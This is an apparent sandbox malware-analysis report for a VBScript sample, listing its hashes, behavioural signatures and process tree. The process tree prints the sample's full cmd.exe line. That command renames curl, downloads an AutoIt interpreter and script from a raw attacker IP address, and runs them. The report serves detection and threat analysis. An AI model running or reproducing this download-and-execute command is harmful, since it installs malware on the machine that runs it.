Overview

overview

10

Static

static

1

mkpub_XJZ.vbs

windows7-x64

8

mkpub_XJZ.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    02/10/2023, 13:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mkpub_XJZ.vbs

  • Size

    3KB

  • MD5

    f291fb33af097675047e8818db037f7a

  • SHA1

    a3c614d7d71468d9a1018935fdcd5891c24c027c

  • SHA256

    8fa02af99bf10e756bc61dd214f3470ac85c2eb646c78f8fd2aa7932bc72c6bb

  • SHA512

    96c61b9ed56f3ea2545da04be878d46f98e056f37852176ffc02f986e3499a6af47cacb2bbf7a881a7bd117d09a5438f4ad03902f9fccc8f0fc0275f44e6b934

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\mkpub_XJZ.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir c:\rqdp & cd /d c:\rqdp & copy c:\windows\system32\curl.exe rqdp.exe & rqdp -H "User-Agent: curl" -o Autoit3.exe http://81.19.135.17:2351 & rqdp -o ccwpjf.au3 http://81.19.135.17:2351/msirqdppgyg & Autoit3.exe ccwpjf.au3
      2⤵
        PID:3008

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads